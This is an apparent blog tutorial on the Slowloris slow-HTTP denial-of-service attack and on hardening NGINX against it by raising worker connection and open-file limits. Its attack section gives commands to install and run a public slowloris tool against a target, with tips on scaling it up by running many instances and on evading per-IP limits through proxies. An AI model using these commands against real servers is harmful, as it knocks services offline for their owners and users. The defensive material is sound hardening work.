Slowloris DoS Attack and Mitigation on NGINX Web Server
1. Introduction
Slowloris DoS Attack gives a hacker the power to take down a web server in less than 5 minutes by just using a moderate personal laptop. The whole idea behind this attack technique is making use of HTTP GET requests to occupy all available HTTP connections permitted on a web server.
Technically, NGINX is not affected by this attack since NGINX doesn’t rely on threads to handle requests. Instead it uses a much more scalable event-driven (asynchronous) architecture. However, we can see later in this article that in practice, the default configurations can make an NGINX web server “vulnerable” to Slowloris.
In this article, we are going to take a look at this attack technique and some way to mitigate this attack on NGINX.
2. Slowloris DoS Attack
From acunetix:
A Slow HTTP Denial of Service (DoS) attack, otherwise referred to as Slowloris HTTP DoS attack, makes use of HTTP GET requests to occupy all available HTTP connections permitted on a web server.
A Slow HTTP DoS Attack takes advantage of a vulnerability in thread-based web servers which wait for entire HTTP headers to be received before releasing the connection. While some thread-based servers such as Apache make use of a timeout to wait for incomplete HTTP requests, the timeout, which is set to 300 seconds by default, is re-set as soon as the client sends additional data.
This creates a situation where a malicious user could open several connections on a server by initiating an HTTP request but does not close it. By keeping the HTTP request open and feeding the server bogus data before the timeout is reached, the HTTP connection will remain open until the attacker closes it. Naturally, if an attacker had to occupy all available HTTP connections on a web server, legitimate users would not be able to have their HTTP requests processed by the server, thus experiencing a denial of service.
This enables an attacker to restrict access to a specific server with very low utilization of bandwidth. This breed of DoS attack is starkly different from other DoS attacks such as SYN flood attacks which misuse the TCP SYN (synchronization) segment during a TCP three-way-handshake.
How it works
An analysis of an HTTP GET request helps further explain how and why a Slow HTTP DoS attack is possible. A complete HTTP GET request resembles the following.
GET /index.php HTTP/1.1[CRLF] Pragma: no-cache[CRLF] Cache-Control: no-cache[CRLF] Host: testphp.vulnweb.com[CRLF] Connection: Keep-alive[CRLF] Accept-Encoding: gzip,deflate[CRLF] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36[CRLF] Accept: */*[CRLF][CRLF]
Something that is of particular interest is the [CRLF]
in the GET request above. Carriage Return Line Feed (CRLF), is a non-printable character that is used to denote the end of a line. Similar to text editors, an HTTP request would contain a [CRLF]
at the end of a line to start a fresh line and two [CRLF]
characters (i.e. [CRLF][CRLF]
) to denote a blank line. The HTTP protocol defines a blank line as the completion of a header. A Slow HTTP DoS takes advantage of this by not sending a finishing blank line to complete the HTTP header.
To make matters worse, a Slow HTTP DoS attack is not commonly detected by Intrusion Detection Systems (IDS) since the attack does not contain any malformed requests. The HTTP request will seem legitimate to the IDS and will pass it onto the web server.
Perform a Slowloris DoS Attack
Performing a Slowloris DoS Attack is a piece of cake nowadays. We can easily find a lot of implementations of the attack hosted on GitHub with a simple Google search.
For demonstration, we can use a Python implementation of Slowloris to perform an attack.
How this code works
This implementation works like this:
- We start making lots of HTTP requests.
- We send headers periodically (every ~15 seconds) to keep the connections open.
- We never close the connection unless the server does so. If the server closes a connection, we create a new one keep doing the same thing.
This exhausts the servers thread pool and the server can’t accept requests from other people.
How to install and run this code
You can clone the git repo or install using pip. Here’s how we run it.
$ sudo pip3 install slowloris $ slowloris example.com
That’s it. We are performing a Slowloris attack on example.com!
If you want to clone using git instead of pip, here’s how you do it.
git clone https://github.com/gkbrk/slowloris.git cd slowloris python3 slowloris.py example.com
By default,
slowloris.py
will try to keep 150 open connections to target web server and you can change this number by adding command line argument “-s 1000”.However, because this code sends keep-alive messages for one connection after another (not in parallel), some connections will get timed out and disconnected by the target server before its turn of sending keep-alive message. The result is that, in practice, an instance of slowloris.py can only keep about 50-100 open connections to the target.
We can work around this limitation by opening multiple instances of slowloris.py, with each trying to keep 50 open connections. That way, we can keep thousands of connections open with only one computer.
3. Preventing and Mitigating Slowloris (a.k.a. Slow HTTP) DoS Attacks in NGINX
Slowloris works by opening a lot of connections to the target web server, and keeping those connections open by periodically sending keep-alive messages on each connections to the server. Understanding this, we can come up with several ways to mitigate the attack.
Technically, Slowloris only affects thread-based web servers such as Apache, while leaving event-driven (asynchronous) web servers like NGINX unaffected. However, the default configurations of NGINX can make NGINX vulnerable to this attack.
Identify the attack
First of all, to see if our web server are under attack, we can list connections to port 80 on our web server by running the following command:
$ netstat -nalt | grep :80
The output will look like this:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 10.128.0.2:48406 169.254.169.254:80 ESTABLISHED tcp 0 0 10.128.0.2:48410 169.254.169.254:80 ESTABLISHED tcp 0 0 10.128.0.2:48396 169.254.169.254:80 CLOSE_WAIT tcp 0 0 10.128.0.2:48398 169.254.169.254:80 CLOSE_WAIT tcp 0 0 10.128.0.2:48408 169.254.169.254:80 ESTABLISHED tcp 0 0 10.128.0.2:48400 169.254.169.254:80 CLOSE_WAIT
We can further filter only the open connections by running the following command:
$ netstat -nalt | grep :80 | grep ESTA
The output will look like:
tcp 0 0 10.128.0.2:48406 169.254.169.254:80 ESTABLISHED tcp 0 0 10.128.0.2:48410 169.254.169.254:80 ESTABLISHED tcp 0 0 10.128.0.2:48408 169.254.169.254:80 ESTABLISHED
We can also count the open connections by adding -c
to the end of the above command:
$ netstat -nalt | grep :80 | grep ESTA -c
The output will be the number of connections in the filtered result:
3
How is NGINX vulnerable to Slowloris?
NGINX can be vulnerable to Slowloris in the several ways:
- Config #1: By default, NGINX limits the number of connections accepted by each worker process to 768.
- Config #2: Default number of open connections limited by the system is too low.
- Config #3: Default number of open connections limited for nginx user (usually www-data) is too low.
- Config #4: By default, NGINX itself limits the number of open connections for its worker process no more than 1024.
For example, let’s say we run NGINX on a 2-core CPU server, with default configurations.
- Config #1: NGINX will run with 2 worker process, which can handle up to 768 x 2 = 1536 connections.
- Config #2: Default number of open connections limited by the system: soft limit = 1024, hard limit = 4096.
- Config #3: Default number of open connections limited for nginx user (usually www-data): soft limit = 1024, hard limit = 4096.
- Config #4: By default, NGINX itself limits the number of open connections for its worker process no more than 1024.
Therefore NGINX can handle at most 1024 connections. That will take only 20 instances of slowloris.py
to take the server down. Wow!
Mitigation
We can mitigate the attack in some network related approach like:
- Limiting the number of connections from one IP
- Lower the timed out wait time for each http connection
However, by using proxies (such as TOR network) to make connections appear to be from different IPs, the attacker can easily by pass these network defense approaches. After that, 1024 connections is something that is pretty easy to achieve.
Therefore, to protect NGINX from this type of attack, we should optimize the default configurations mentioned above.
Config #1: NGINX worker connections limit
Open nginx configuration file, which usually located at /etc/nginx/nginx.conf
, and change this setting:
events { worker_connections 768; }
to something larger like this:
events { worker_connections 100000; }
This settings will tell NGINX to allow each of its worker process to handle up to 100k connections.
Config #2: system open file limit
Even we told NGINX to allow each of its worker process to handle up to 100k connections, the number of connections may be further limited by the system open file limit.
To check the current system file limit:
$ cat /proc/sys/fs/file-max
Normally this number would be 10% of the system’s memory, i.e. if our system has 2GB of RAM, this number will be 200k, which should be enough. However, if this number is too small, we can increase it. Open /etc/sysctl.conf
, change the following line to (or add the line if it’s not already there)
fs.file-max = 500000
Apply the setting:
$ sudo sysctl -p
Check the setting again:
$ cat /proc/sys/fs/file-max
The output should be:
fs.file-max = 500000
Config #3: user’s open file limit
Besides system-wide open file limit as mentioned in Config #2, Linux system also limit the number of open file per user. By default, NGINX worker processes will run as www-data
user or nginx
user, and is therefore limited by this number.
To check the current limit for nginx’s user (www-data
in the example below), first we need to switch to www-data user:
$ sudo su - www-data -s /bin/bash
By default, www-data
user is not provided with a shell, therefore to run commands as www-data
, we must provide a shell with the -s
argument and provide the /bin/bash
as the shell.
After switching to www-data
user, we can check the open file limit of that user:
$ ulimit -n
To check the hard limit:
$ ulimit -Hn
To check the soft limit:
$ ulimit -Sn
By default, the soft limit is 1024 and hard limit is 4096, which is too small to survive a Slowloris attack.
To increase this limit, open /etc/security/limits.conf
and add the following lines (remember to switch back to a sudo user so that we can edit the file):
* soft nofile 102400 * hard nofile 409600 www-data soft nofile 102400 www-data hard nofile 409600
A note for RHEL/CentOS/Fedora/Scientific Linux users
For these systems, we will have to do an extra steps for the limit to take effect. Edit /etc/pam.d/login
file and add/modify the following line (make sure you get pam_limts.so
):
session required pam_limits.so
then save and close the file.
The user must be logout and re-login for the settings to take effect.
After that, run the above checks to see if the new soft limit and hard limit have been applied.
Config #4: NGINX’s worker number of open files limit
Even when the ulimit -n
command for www-data
returns 102400, the nginx worker process open file limit is still 1024.
To verify the limit applied to the running worker process, first we need to find the process id of the worker process by listing the running worker processes:
$ ps aux | grep nginx root 1095 0.0 0.0 85880 1336 ? Ss 18:30 0:00 nginx: master process /usr/sbin/nginx www-data 1096 0.0 0.0 86224 1764 ? S 18:30 0:00 nginx: worker process www-data 1097 0.0 0.0 86224 1764 ? S 18:30 0:00 nginx: worker process www-data 1098 0.0 0.0 86224 1764 ? S 18:30 0:00 nginx: worker process www-data 1099 0.0 0.0 86224 1764 ? S 18:30 0:00 nginx: worker process
then take one of the process ids (e.g. 1096 in the above example output), and then check the limit currently applied to the process (remember to change 1096 to the right process id in your server):
$ cat /proc/1096/limits Limit Soft Limit Hard Limit Units Max cpu time unlimited unlimited seconds Max file size unlimited unlimited bytes Max data size unlimited unlimited bytes Max stack size 8388608 unlimited bytes Max core file size 0 unlimited bytes Max resident set unlimited unlimited bytes Max processes 15937 15937 processes Max open files 1024 4096 files Max locked memory 65536 65536 bytes Max address space unlimited unlimited bytes Max file locks unlimited unlimited locks Max pending signals 15937 15937 signals Max msgqueue size 819200 819200 bytes Max nice priority 0 0 Max realtime priority 0 0 Max realtime timeout unlimited unlimited us
You can see that the max open files is still 1024:
Max open files 1024 4096 files
That is because NGINX itself also limits the number of open files by default to 1024.
To change this, open NGINX configuration file (/etc/nginx/nginx.conf
) and add/edit the following line:
worker_rlimit_nofile 102400;
Make sure that this line is put at the top level configurations and not nested in the events
configuration like worker_connections
.
The final nginx.conf
would look something like this:
user www-data; worker_processes auto; pid /run/nginx.pid; worker_rlimit_nofile 102400; events { worker_connections 100000; } ...
Restart NGINX, then verify the limit applied to the running worker process again. The Max open files
should now change to 102400.
Congratulations! Now your NGINX server can survive a Slowloris attack. You can argue that the attacker can still make more than 100k open connections to take down the target web server, but that would become more of any DDoS attack than Slowloris attack specifically.
Conclusions
Slowloris is a very smart way that allows an attacker to use very limited resources to perform a DoS attack on a web server. Technically, NGINX servers are not vulnerable to this attack, but the default configurations make NGINX vulnerable. By optimizing the default configurations on NGINX server, we can mitigate the attack.
If you haven’t check your NGINX server for this type of attack, you should check it now, because tomorrow, who knows if a curious high school kid would perform a Slowloris attack (“for educational purposes”) from his laptop and take down your server. 😀